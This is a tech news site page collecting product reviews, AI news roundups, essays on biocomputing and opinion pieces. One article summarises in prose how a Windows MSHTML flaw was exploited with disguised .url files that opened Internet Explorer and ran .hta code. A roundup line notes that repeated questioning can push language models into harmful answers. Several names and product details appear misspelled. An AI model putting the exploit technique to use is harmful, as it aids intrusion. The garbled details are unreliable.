Hard to believe but Apple watch now has 10 versions since it was created - so what did Apple change and improve for the big milestone? A few things, some good, some probably unnecessary...
Video Courtesy of MacRumors
Budget tight? Want someone to think you spent more on them than you really did? Then check out the The Wyze Cam v4. It's packed with features aimed at enhancing home security from 2K HD video to motion-activated spotlights and Wi-Fi 6 support. For the price, the camera's resolution and Wide Dynamic Range (WDR) produce impressively vibrant images in daylight, though color night vision tends to be less consistent, sometimes appearing murky.
Setup is quick thanks to Bluetooth and screw-free mounting, which eliminates the usual QR code hassles. However, being a wired camera limits placement options. The spotlight and siren offer basic deterrent features, though the siren lacks the punch to induce panic in an intruder, it's enough to startle them and hopefully do the trick.
Audio is improved with an upgraded mic and amplifier, making two-way talk clearer, though still not perfect in noisy environments. Users can enjoy smart home integration with Alexa, Google Assistant, and IFTTT, though the camera feels most seamless within the Wyze ecosystem.
While Wyze Cam v4’s combination of affordability, connectivity, and storage options (up to 512GB locally or cloud storage) make it a strong contender for budget-conscious buyers, its limitations in low-light performance and audio clarity may leave some users wanting more.
But there's no question, what you get for the price is truly amazing - as these are going on Amazon currently for UNDER $25.
The TRI headphone series from H2O Audio bring a robust waterproof design to the table, boasting an IPX8 rating that allows them to be submerged up to 12 feet—ideal for swimmers, surfers, and snorkelers. Bone conduction technology provides reliable audio clarity both in and out of the water, though the sound quality underwater may still require the included earplugs for an optimal experience.
These headphones are crafted to withstand intense activities, from swimming to cycling, with 8GB of storage, letting users store plenty of music for extended workouts. Playlist+ technology is a standout feature, allowing users to record and replay live-streamed audio - the reason behind this Bluetooth signals do not transmit well in the water, no device can get around that, but you may forget this with these on.
The thing that surprised me the most has to be the battery life - as soon as you turn it on a voice tells you the charge level, and I probably used them 6 or 7 times before it warned me it was 'low', I'm seeing people getting anywhere from 5hrs to 9hrs of playtime in buyer reviews.
Their one-year "Go Beyond" warranty, extendable to two years, adds peace of mind to an already well-rounded sports headphone option.
While they are available from Amazon we found the best prices directly on the company's website.
The Amazon Fire Kids Tablet is designed specifically with younger users in mind, offering robust parental controls and pre-installed filters to ensure a safe browsing experience for kids aged 12 and under. The tablet includes a kid-friendly interface that makes it easy to navigate while limiting access to age-inappropriate content, giving parents peace of mind.
Performance-wise, the tablet runs smoothly for basic activities like streaming videos, playing games, or using educational apps. However, it’s not built for heavy multitasking, and older kids might find the hardware sluggish for more demanding apps. Battery life is decent, lasting around 7–10 hours depending on usage, making it a solid companion for road trips or study sessions.
One standout feature is the included one-year subscription to Amazon Kids+, granting access to a wealth of age-appropriate books, games, videos, and educational content. Parents can customize time limits and app permissions to tailor the device to their child’s needs. The sturdy case and two-year worry-free guarantee make this tablet a durable choice for younger kids prone to accidental drops.
While it’s a great starter device, its limitations in speed and screen resolution might feel restrictive as kids grow older. Still, for younger users, the Fire Kids Tablet strikes an excellent balance between safety, entertainment, and educational value.
Amazon recently just dropped the price by a massive 56% so it's currently just $79 on Amazon.
No matter who you’re shopping for, the right tech gift can bring a little extra excitement to the holiday season. From practical and budget-friendly choices to devices tailored for active lifestyles and kid-friendly favorites, these picks are sure to impress without the stress. As you wrap up your holiday shopping, remember it’s not just about the gadgets—it’s about the joy and memories they create. Happy gifting, and here’s to a tech-filled Christmas!
-----------
Author: Trevor Kingsley
Tech News CITY // New York Newsroom
Welcome to THE EDGE, a series that focuses on the edge of technology. This series will not be about obscure, small advances in technology—our goal is to be where you will first hear about something that everyone will be talking about in the next few years. This is where you'll discover tech with the ability to transform and shape our future, and follow its development from its earliest phases.
Personally, as someone who's been interested in the evolution of technology for as long as I can remember, I feel the next wave of technology comes with a risk factor we haven't seen before.
AI brings with it the disruption of human-to-human interaction, whether it be professionally, as it replaces co-workers or entire departments in the workforce, or in the still little-explored but very real issue of AI replacing intimate personal relationships. Virtual reality opens the doors to everything from entertainment reaching new levels of immersion to face-to-face interactions, meetings, and even family gatherings, regardless of the miles separating people. But it also comes with the very real risk of people choosing virtual worlds over real life, replacing themselves with an avatar based on their idealized version of themselves. It can feel real enough that it's easy to ignore the fact that the only interactions in this virtual world are between façades.
The source of the most dangerous technology has remained the same for most of human history, probably because it has always had the largest budget—and that is military technology. Even here, advances introduce entirely new levels of danger, where the atom bomb has become just one of several weapons that could end mankind.
But I chose the topic for this first issue for several reasons: the ability of this technology to have major implications on all the other technologies I've mentioned, the pace at which it is progressing, and the very real concerns that come with it. However, my primary reason for choosing this topic is that while people are familiar with the general concept, outside of the labs where its development is taking place, people seem completely unaware of just how deep scientists are into this uncharted territory.
I’m talking about where life meets machine—the point where the lines between the biological and the artificial are not just blurred, they’re rapidly becoming entirely erased.
The human brain can rapidly process massive amounts of data, and brain cells also require less energy to do the work. It turns out when these cells are given data, they return data as well. This has scientists now working towards a new kind of computer processor, one powered by the neurons we have in our brains instead of silicon.
Lab-Grown Brains:
The stem cells can come from a number of sources, one popular source for researchers are the previously-discarded foreskin from circumcised infants. These cells can can basically be re-programmed to become stem cells. Stem cells can be thought of as a human cell that hasn't yet been told what it should become, it can turn into tissue, skin, organs, bone - this is when OI researchers are able guide these cells to become neurons, by putting them in a culture dish with already formed neurons, the neurons secrete molecules that (for lack of better words) tricks the stem cell in to thinking it is supposed to help grow a human brain. Done repeatedly, and eventually you have a lab grown brain.
Controversy
The largest concern with Organoid Intelligence is the eventuality of such brain organoids becoming conscious or sentient. Currently, scientists agree that so far, the organoids used in research are too simple to become conscious.
However, as these systems become more complex, and lab grown 'mini-brains' are no longer 'mini' - these artificially constructed brains could develop the the capacity to feel or, worse, think.
Wetware is our human 'hardware' - the parts of human biology able to process data, such as the brain and central nervous system. Wetware, in more advanced contexts, embraces also engineered or synthetic biological constructs merging the natural, real capabilities of the brain with advanced technology.
Controversy
Wetware falls into that gray area between biology and technology, begging questions of autonomy, human identity, and the ethics involved in manipulating living systems for technological ends. Some critics see it as the commodification of life or reducing human beings to mere components of larger machine-driven systems. The most heated debates will continue to revolve around privacy and control—are these systems vulnerable to being hacked or manipulated? What might happen when biological and digital components have become so intertwined as to be inseparable?
What's Next?
Wetware systems are here, and just weeks ago, became accessible to people outside of research labs when a Swiss company announced the world's first 'neuroplatform' where a 4-Organoid biocomputer can be accessed for a $500/month fee.
Now that it's here, the future of wetware is about increasing its capabilities, by growing larger networks of lab-grown neutrons. The successive stages of development into brain-computer interfaces will be advanced neuroprosthetics, neural interfaces that WOULD enable real-time interaction between the activity of a brain and machine learning algorithms. Among other things, this might have serious implications from both the medical and enhancement ends, pushing us toward a world where thoughts can directly control computers—and conceivably vice versa.
Neural Dust is formed from micro-sized, wirelessly powered sensors that can be implanted in the human body and, more particularly, inside the brain, for the perception and manipulation of neural activity. These speck-of-dust-sized particles operate on the power provided by external ultrasound to send information about real-time brain activity to the outside world. Some of the other potential uses of Neural Dust include the treatment of various neurological disorders, such as epilepsy, and deeper brain-computer interfacing that could enable people to control machines with their minds.
Controversy
The very notion of dust-sized sensors nestled inside our bodies or brains conjures up certain immediate implications of privacy and self-governance. That such sensors may, in fact, be capable of monitoring brain activity and maybe even altering it opens up a Pandora's box of ethical considerations: who does the information belong to, and what are the safeguards against misuse or surveillance? In theory, Neural Dust might allow for highly invasive monitoring; it could be a tool for government overreach or corporate exploitation. There are also medical risks since the long-term effects of having foreign objects implanted in the body—let alone the brain—are not yet fully understood.
What's Next?
But despite these cautions, researchers forge ahead. The next generation of Neural Dust sensors will be even smaller and could, in theory, be used to monitor individual neurons and directly respond with artificial intelligence. Applications could range from advanced medical treatments to human augmentation and more: the direct integration of the brain with the machinery around it. At every single step, there will be the need to discuss exhaustively privacy, consent, safety, and security.
Organoid Intelligence, Wetware, and Neural Dust are only the very cutting edges of technologies where biology and computing meet. While such technologies have the power to disrupt businesses, from medicine to artificial intelligence, by providing never-before-imagined capabilities, they also face us with a completely new world of ethical dilemmas and beg questions about our stance toward technology, biology, and our perceived sense of self.
The crazy thing is, this still barely scratches the surface. But the goal isn’t to cover everything there is to know, but instead to cover what you need to know to stay informed, aware, and ready for how emerging new technologies can shape our world - and our lives.In little more than a decade, AI has emerged as one of the most disruptive technologies of our times-machines can now learn from big data, and thereby enable computers to perform tasks that hitherto have been the exclusive domain of humans. From furthering scientific research to solving sustainability issues worldwide, the possibilities seem endless with AI. However, the UN is sounding the alarm over the risk this technology will pose, especially in potentially creating a wide disparity gap between various parts of the world if left unmanaged.
A Double-Edged Sword
The UN speaks to the tremendous promise of AI in its recent report entitled Governing AI for Humanity. It points out that AI is actually enabling progress in scientific discovery, medicine, and sustainability much faster than ever imagined. Basically, the AI-driven systems do help analyze climate data, enhance resource management, and help achieve the UN Sustainable Development Goals.
In this way, AI is positioned as a driving component in solving some of the current world problems, from eradicating poverty to mitigating climate change.
The UN, however, warns that minus a global strategy that oversees and regulates AI, the technology could exacerbate inequalities. Wealthy nations and corporations that have resources to develop and deploy AI on a large scale will have the monopoly of benefits accruing from the technology, while underdeveloped regions become left behind, unable to access or employ AI tools that could better their economies, health, and educational sectors.
Disinformation, Automated Weapons, and Climate Risks
The UN is also not much concerned with it, seeing how AI will cause an economic imbalance. Besides that, there's a different warning of the dark side of its capabilities, with the possibility that it could spread disinformation, fuel conflict, and exacerbate climate change.
Unfortunately, AI can be a game-changing device in manipulating algorithms to generate and amplify disinformation on social media, directly swaying public opinions and undermining societies. Considering the already alarming prevalence of fake news and misinformation online, this prospect is definitely distressing. If it fell into the wrong hands, this might be used to disrupt democratic processes and human trust within a society, leading to further fragmentation.
Another alarming aspect of AI development is that, within the process of automating weapons, it emerges as a global security concern. Employing autonomous flying drones and other AI-powered weapons systems primarily opens up ethical concerns about warfare, but also the possibility of unintended consequences arising in conflict zones.
Moreover, large-scale AI systems demand great energy for operation and in turn pose an imminent environmental threat. Their training requires huge computational resources that most of the time lead to increased carbon emissions. Now, if not managed properly, the tool expected to fight against climate change would be further accelerating the process-a Catch-22 problem that the global community needs to solve extremely urgently.
The Imperative for a Global AI Strategy
With full realization that AI is capable of solving and creating problems, the UN, therefore, entreats international cooperation in the governance of the making and deployment of AI technologies. What is being demanded is a holistic global approach to ensure benefits accruing from AI are shared equitably and the risks mitigated. This ranges from setting ethical standards and developing transparent regulatory frameworks to fostering cooperation among nations to bridge the digital divide. There is little question that AI holds much promise, but all things considered, its perils are real. In the assessment from the UN, only through a joined approach globally can humans make certain that AI proves to be a tool for placements of progress for one and for all, rather than a driver of inequality.
-----------
Author: Trevor Kingsley
Tech News CITY // New York Newsroom
Google Docs' long-standing dominance in the collaborative document editing space is facing new challenges. Over the past two months, two major players have entered the arena, potentially reshaping the landscape of online document creation and editing.
Zoom's offering comes with a tiered pricing model. Free account holders can access basic features but are limited to sharing up to 10 documents simultaneously. Paid plans, starting at $14.99 per month, remove this limitation and include access to an AI writing assistant, adding an extra layer of functionality that could appeal to power users.
The key question now is whether these new entrants can make a significant dent in Google Docs' user base. While there hasn't been any major controversy surrounding Google Docs to drive users away, there is a growing trend of individuals and businesses seeking alternatives to Google's ecosystem. This sentiment extends beyond just document editing, with Google facing increased competition in its core search business as well.
However, it remains to be seen whether the market segment looking for Google alternatives is substantial enough to propel these new competitors to success. The coming months will be crucial in determining whether Proton and Zoom can carve out significant market share in this space.
As these new platforms evolve and user adoption patterns emerge, we'll be keeping a close eye on how this competition unfolds. It's an exciting time in the world of collaborative document editing, and the implications could extend far beyond just how we create and edit documents online.
____
Author: Stephen Hannan
New York Newsroom
The world of artificial intelligence continues to evolve rapidly, with new developments emerging across various domains. Here's a roundup of the latest AI news:
Recent advancements in AI-generated images have been remarkable, with models like Flux producing incredibly realistic human portraits. While some minor imperfections remain, such as gibberish text on lanyards or slightly off microphone renderings, the overall quality is becoming increasingly difficult to distinguish from real photographs.
Open AI, one of the leading AI research companies, has been at the center of several developments and controversies:
Cryptic "Strawberry" References: CEO Sam Altman posted an image of strawberries, fueling speculation about a rumored advanced AI model codenamed "Strawberry."
Leadership Changes: Co-founder John Sheu left to join Anthropic, while Greg Brockman announced an extended sabbatical.
New Board Member: Ziko Kolter, an AI safety and alignment expert, joined Open AI's board.
GPT-4.0 System Card: Open AI released a detailed report on safety measures for GPT-4.0.
Emotional Attachment Warning: The company cautioned about potential user emotional reliance on AI voice modes.
Structured Outputs API: A new feature for developers was introduced to improve data handling.
AI Text Detection Tool: Open AI developed but chose not to release a tool for identifying AI-generated text.
Legal Challenges: Elon Musk filed a new lawsuit against Open AI, while a YouTuber initiated a class action suit over alleged copyright infringement.
Anthropic launched a bug bounty program offering up to $115,000 for discovering novel jailbreak attacks on their AI models.
HubSpot released a toolkit designed to help job seekers leverage AI in their search for employment opportunities.
Character AI's co-founders are joining Google, with the company's CEO returning to his former employer to work on AI models at DeepMind.
Qwen-2-Math: A new large language model fine-tuned for mathematical tasks outperforms existing models in benchmark testing.
ByteDance's Jimang AI: TikTok's parent company debuted a new AI video generation model, though its capabilities compared to Open AI's Sora remain unclear.
Runway ML Updates: Runway introduced a new feature allowing users to specify ending frames in AI-generated videos.
Opus Clip Enhancements: The AI-powered video clipping tool added new capabilities for identifying specific content within videos.
WordPress AI Writing Tool: Automatic launched an AI tool to improve blog readability.
Amazon Music and Audible AI Features: Both platforms are testing AI-powered content discovery features.
Reddit AI Search: The platform is testing AI-generated summaries for search results.
Google's AI-Powered TV Streamer: A new device leveraging Gemini AI for content curation is in development.
AI in Drive-Throughs: Wendy's is testing AI-powered ordering systems with improved accuracy.
Robotics Advancements: Google DeepMind showcased a table tennis-playing robot, while Nvidia demonstrated AR-controlled robotics using Apple Vision Pro.
New Humanoid Robot: Figure Robotics unveiled the Figure 02, a new humanoid robot being tested on BMW production lines.
As AI technology continues to advance, we can expect to see more innovations and integrations across various industries in the coming months, and you'll hear about them here as soon as it happens!
-----------
Author: Trevor Kingsley
Tech News CITY // New York Newsroom
Hackers have been targeting Windows 10 and 11 users with malware for over a year, but a fix has finally arrived in the latest Windows update released on July 9th.
This vulnerability, exploited by malicious code since at least January 2023, was reported to Microsoft by researchers. It was fixed on Tuesday as part of Microsoft’s monthly patch release, tracked as CVE-2024-38112. The flaw, residing in the MSHTML engine of Windows, had a severity rating of 7.0 out of 10.
Security firm Check Point discovered the attack code, which used “novel tricks” to lure Windows users into executing remote code. One method involved a file named Books_A0UJKO.pdf.url, which appeared as a PDF in Windows but was actually a .url file designed to open an application via a link.
Internet Explorer Continues to Haunt Windows...
When viewed in Windows, these files looked like PDFs, but they opened a link that called msedge.exe (Edge browser). This link included attributes like mhtml: and !x-usc:, a trick long used by threat actors to open applications such as MS Word. Instead of opening in Edge, the link would open in Internet Explorer (IE), which is less secure and outdated.
Internet Explorer, Microsoft's infamously insecure browser has been discontinued for years, and even more previously unknown vulnerabilities are still occasionally discovered. The point being - once a hacker has Internet Explorer open, and the ability to tell it to open a URL, they can choose from a wide variety of methods to install software, execute code, or destroy data.
IE would prompt the user with a dialog box to open the file, and if the user clicked “open,” a second dialog box appeared, vaguely warning about opening content on the Windows device. Clicking “allow” would cause IE to load a file ending in .hta, running embedded code.
Haifei Li, the Check Point researcher who discovered the vulnerability, summarized the attack methods: the first technique used the “mhtml” trick to call IE instead of the more secure Chrome/Edge. The second technique tricked users into thinking they were opening a PDF while actually executing a dangerous .hta application. The goal was to make victims believe they were opening a PDF using these two tricks.
Check Point’s report includes cryptographic hashes for six malicious .url files used in the campaign, which Windows users can use to check if they’ve been targeted.
____
Author: Stephen Hannan
New York Newsroom
Apple is about to make waves in the digital payment space when iOS 18 goes live - support for Apple Pay on non-Safari desktop web browsers. That's right, apple pay in Windows PCs inside of Chrome or Firefox. It appears Apple's goal is to make Apple Pay something people use for every transaction they make.
Apple demonstrated the new feature for a group of developers at WWDC 2024 who shared the details with us.
Here's How it Will Work...
If you’re browsing the web on a desktop browser that isn’t Safari and you spot an Apple Pay button, you’re in luck, clicking that button will now generate a special QR code. Pull out your
iPhone running iOS 18, scan the code, and voila – it's like any other Apple Pay transaction from this point. This not only makes shopping more convenient but also bridges the gap between different platforms, enhancing the overall user experience.
Until Now, Apple Pay Was Only Accessible in Very Specific Situations...
Using Apple Pay outside of an Apple produced mobile device was limited to Macs computers/laptops, and even they were limited to using it only when using the Safari browser. This update really is a big change.
Regardless of your browser or operating system, you might start noticing a lot more Apple Pay buttons popping up across the web.
From a particle point of view, this option seems both faster and easier than typing in a credit card number. But in cases where someone is using service they use often and likely has their card on file, using Apple Pay would be an additional pointless step.
Stay tuned for more updates as we inch closer to the iOS 18 release date this fall!
-----------
Author: Alex Benningram
Tech News CITY // New York Newsroom
Like every week, there has been a torrent of AI news, reflecting the rapid progress and growing implications of this transformative technology. While many updates represent incremental advancements, some developments carry profound future implications, and a few are simply downright bizarre and amusing.
The AI Landscape's Overwhelming Complexity
An infographic from First Mark Capital vividly illustrates the staggering complexity of the current AI landscape. Dubbed the "2024 ML/AI/Data Landscape," the image depicts the sheer number of companies involved in this space, encompassing both established giants and numerous smaller players. This visual representation serves as a stark reminder of just how monumental and widespread the AI revolution has become.
Microsoft and OpenAI's Ambitious Data Center Plans
Unconfirmed reports suggest that Microsoft and OpenAI are planning a $100 billion data center project, which would be a staggering 100 times more costly than some of the largest existing data centers. The proposed facility would house an artificial intelligence supercomputer dubbed "Stargate." If realized, this endeavor could propel OpenAI and Microsoft to an unprecedented lead, making it challenging for other companies or open-source models to catch up.
OpenAI's Synthetic Voice Capabilities
OpenAI has unveiled its ability to generate realistic synthetic voices from a single 15-second audio sample. The quality of these AI-generated voices surpasses even the impressive capabilities of tools like Elevenlabs. However, while showcasing this remarkable feat, OpenAI has refrained from making the technology publicly available due to potential misuse concerns. The company is advocating for measures to protect individuals' voices, educate the public about AI-generated content, and develop techniques to track the origin of audiovisual media.
Advancements in AI Art and Music Generation
Several developments in AI-powered art and music generation have emerged. OpenAI has introduced an inpainting feature for its DALL-E model, allowing users to selectively modify specific areas of generated images. Stability AI has unveiled Stable Audio 2.0, enabling the generation of three-minute songs and audio-to-audio generation based on hummed or instrument sounds. However, the quality of AI-generated music remains a subject of debate, with a group of musicians, including Nicki Minaj and Katy Perry, signing a letter expressing concerns about the irresponsible use of AI in music.
Anthropic's Research and Apple's AI Ambitions
Anthropic researchers have discovered that repeatedly asking harmless questions to large language models can eventually lead them to provide potentially harmful information, a phenomenon they are actively investigating. Meanwhile, Apple appears to be deepening its involvement in AI, revealing the "Realm" language model designed to enhance voice assistants like Siri by improving context understanding and reference resolution.
Ethical Concerns and Regulatory Developments
Ethical and regulatory issues surrounding AI continue to surface. A court in Washington has banned the use of AI-enhanced video evidence, citing concerns about the potential for inaccuracies introduced by upscaling algorithms. Additionally, the company behind the AI-generated George Carlin standup comedy set has agreed to remove all related audio and video content following a settlement with Carlin's estate.
Bizarre and Amusing AI Applications
Among the more unusual AI developments, an autonomous electric scooter called the Ola Solo has been introduced in India, claiming to be the first fully self-driving scooter. In Phoenix, Waymo vehicles are now delivering Uber Eats orders, allowing customers to retrieve their food from self-driving cars. Furthermore, an upcoming season of the Netflix reality show "The Circle" will feature an AI catfish participant, adding an intriguing twist to the dating-focused premise.
As the AI news cycle continues to accelerate, it becomes increasingly evident that we are witnessing a technological revolution of unprecedented scale and impact. Stay tuned for more developments, insights, and discussions as we collectively navigate the challenges and opportunities of this "next wave" of innovation.
-----------
Author: Trevor Kingsley
Tech News CITY // New York Newsroom
Apple has introduced a new safety feature in their latest iPhone software update to help protect your personal information if your iPhone is ever stolen. It's called Stolen Device Protection.
What it does:
If your iPhone is stolen, this feature makes it harder for someone else to access your private stuff on the phone, like your bank details, saved passwords, or Apple ID.
It works by requiring Face ID or Touch ID instead of just a passcode to take certain actions on the phone. For example, if your iPhone is in an unfamiliar location, the thief would need to use Face ID or Touch ID to make payments with your saved cards or log into your accounts. This helps ensure only you can access your private info, even if a thief knows your passcode.
It also makes you wait 1 hour before changing critical security settings like your Apple ID password if your phone is not in a familiar location. This gives you time to mark your device as lost and secure your account if it's stolen.
What it doesn't protect:
If a thief knows your passcode, they can still access your email and info in unprotected apps. Apple Pay will also still work with just the passcode.
How to turn it on:
First, update your iPhone to the latest software (iOS 17.3 or higher). Go to Settings > General > About to check your current iOS version.
Then go to Settings > Face ID & Passcode. You may need to enter your passcode. Look for "Stolen Device Protection" and turn on the switch so it turns green. This enables the feature.
-----------
Author: Trevor Kingsley
Tech News CITY // New York Newsroom
A new report finds that big tech companies are falling short when it comes to keeping their promises around developing artificial intelligence (AI) responsibly. Researchers at Stanford University looked into how companies that have published ethics rules and hired experts are putting those principles into practice.
What they found is concerning. Even with all the talk of "AI ethics," many companies still prioritize performance and profits over safety and responsibility when building new AI products.
The Stanford Team Interviewed 25 People Working Inside the Current Top AI Companies...
These employees said they lack support and are isolated from other teams. Product managers often see them as hurting productivity or slowing down product releases. One person said "being very loud about putting more brakes on [AI development] was a risky thing to do."
Governments, academics and the public have raised worries about issues like privacy, bias, and AI's impacts on jobs and society. Tools like chatbots are advancing very quickly, with new releases from companies like Google and OpenAI.
Promises to Develop AI Responsibly Seems to Have Been Empty Words, Meant To Calm Public Concern...
Employees within the AI companies say ethical considerations are an afterthought, happening "too late, if at all" - instead, they're told to focus on the numbers, such as user engagement and AI performance. These are the metrics that dominate decision-making, rather than equally important measures around fairness or social good.
In short, despite public commitments to ethics, tech companies are deprioritizing real accountability as they race to build the latest, most advanced artificial intelligence.
Companies Focus on Winning the Race to Release the 'Most Powerful AI' of the Moment, then Learn What it Is Capable Of...
Instead, AI development should be guided by a clear understanding of what the AI their building can and should be able to do, rather than focusing solely on maximizing profits or building the most powerful version.
There's no downplaying the massive challenge for-profit AI companies face as they need to consider innovation, profitability, and ethics - falling short in any of these categories greatly increases the odds that a company will not survive.
It is vital that the AI industry understands it must function differently than any other segment of the tech industry, with investor satisfaction no longer the top priority. This may actually be a fairly simple change to implement, they just need to educate their investors. Informed investors will actually demand that public safety come first, as all would regret funding a company that, for example, triggered a global forced internet shut-down because that was the only way to stop their creation from self-replicating and spreading, or worse.
-----------
Author: Trevor Kingsley
Tech News CITY // New York Newsroom
The world of Artificial Intelligence (AI) is ever-evolving, and this week has been particularly groundbreaking, especially in the realm of AI art. From new features in image generation platforms to legal battles over AI-generated art, there's a lot to unpack. Here's a comprehensive update on what you need to know.
Mid-Journey's In-Painting Feature
Mid-Journey, a prominent player in the AI art space, recently rolled out its in-painting feature. This feature allows users to selectively modify specific regions of an image. For instance, you can change a character's hairstyle or clothing by simply selecting the area and inputting a prompt. The feature has been praised for its ability to produce higher quality and more detailed images when the entire image is selected with the same prompt.
What's Coming Next? According to David, the founder of Mid-Journey, the company is focusing on enhancing the in-painting features and is also prioritizing the development of version 6. This new version aims to offer more control, better text understanding, and improved resolution. However, there's no estimated release date yet.
Ideogram AI: Text to Image Revolution
Ideogram AI, developed by a team from Google Brain, UC Berkeley, CMU, and the University of Toronto, has introduced a standout feature: adding text to AI-generated images. The platform allows users to generate images based on text prompts, offering a level of quality and detail that surpasses other platforms.
Actually, we used it for this article's header image!
Leonardo AI's Anime Pastel Dream
Leonardo AI has added a new model called Anime Pastel Dream, which allows users to generate anime-style images. The model is accessible through the Leonardo app and has been praised for the quality of images it produces.
Legal Challenges in AI Art
A U.S. federal judge recently ruled that AI-generated art cannot be copyrighted if it is produced without human intervention. This decision has sparked debates and discussions about the nuances of copyright laws concerning AI-generated art.
AI in Marketing: A Partnership with HubSpot
In collaboration with HubSpot, we're offering a free report on how AI is revolutionizing marketing. The report, "AI Trends for Marketers in 2023," provides insights into how AI tools are being used to create content faster, analyze data instantly, and increase ROI.
YouTube and AI in Music
YouTube has announced a partnership with Universal Music Group to explore the ethical and responsible use of AI in the music industry. They aim to ensure fair compensation for artists and record labels.
YouTube is also testing a new feature that allows users to hum a song to search for it. Built on a machine-learning model, this feature can identify a song based on its "fingerprint" or signature melody.
Advances in Healthcare
Microsoft and Epic are collaborating to use generative AI in healthcare. They aim to improve clinician productivity, reduce manual labor-intensive processes, and advance medicine for better patient outcomes. AI is also helping paralyzed individuals communicate through brain implants, marking a significant advancement in healthcare technology.
Conclusion
AI is not just a technological marvel; it's a tool that's shaping various industries, from art and marketing to healthcare. Despite some legal and ethical challenges, the future of AI looks promising. Companies are investing heavily in AI, and it's clear that we're just scratching the surface of its potential.
-----------
Author: Trevor Kingsley
Tech News CITY // New York Newsroom
Canadian Prime Minister Trudeau's government has begun to push two bills intended to regulate tech from around the world. These laws could potentially shake the very core of our democracy and the freedom of the internet, and cause countless Canadian online businesses to fail.
First up:
Bill C-18, or the 'Online News Act', requires the tech giants to cough up cash to show links to Canadian news. Google argues that it’s not fair to risk “uncapped financial liability” just for giving Canadians access to news from local publishers.
Google’s solution? Once Bill C-18 kicks in, it'll remove all Canadian links from its Search, News, and Discover services. And Meta (the artist formerly known as Facebook) will follow suit, killing off news content on Facebook and Instagram for users in Canada. Looks like Trudeau's government might've shot itself in the foot with this one.
Canadian Heritage Minister Pablo Rodriguez says that tech giants need to pay their “fair share” for news.
Seems like they’re missing the point. The digital ecosystem is a complex beast, and platforms like Google and Meta often drive huge traffic (and therefore ad revenue) to these news sites. It feels like the administration has it all wrong – instead of helping, they're hurting the very people they’re trying to protect.
The next bill:
Bill C-11, the 'Online Streaming Act', shows yet another clumsy attempt by Trudeau's government to control digital content. It demands that streaming services like Disney+, Netflix, and Spotify must “prominently promote and recommend Canadian programming,” in all official and Indigenous languages.
This puts American companies in a spot, forcing them to pick up the slack for Canadian media's unpopularity, while also having to meet diversity, equity, and inclusion targets that even the Trudeau government isn't hitting. It's a little unsettling that the government seems to think that merely talking about virtues equates to having them.
But these laws aren't about saving Canadian news, they're about controlling it. Bill C-11 lets the government regulate content across the board - TV, radio, websites, and streaming platforms. And just look at the numbers: between 2020 and 2023, federal staff requested content removal over 200 times. If that doesn't scream 'control', I don't know what does.
Most people don't head straight to news websites. They click links shared by friends, find stories through Google searches, or stumble across catchy headlines on Instagram or Facebook. These platforms direct users to lesser-known local news outlets, providing priceless visibility.
Between 2021 and 2022, Facebook reportedly drove more than 1.9 billion clicks to Canadian publishers – that's about $230M worth of free marketing. Sure, Facebook profits from this setup, but that doesn’t mean it should be targeted for extra payouts.
Trudeau and his team often complain about the loss of “independent, nonpartisan newsrooms,” blaming big tech for it. Yet, these same politicians are very active on social media, and if nonpartisan news publishes fair criticism of Trudeau, he'll label is biased with disputing any of the claims made.
Has the response caused Trudeau to rethink his strategy?
Surprisingly, not at all. His government remains stubborn, even stopping ads on Facebook rather than seeking a compromise. Trudeau needs to reevaluate his game plan. Rather than shunning big tech, he should be working towards a balanced regulatory framework that protects the internet's freedom while encouraging economic growth and innovation.
-----------
Author: Alex Benningram
Tech News CITY // New York Newsroom
Copyright © Flashnews Theme. Designed by OddThemes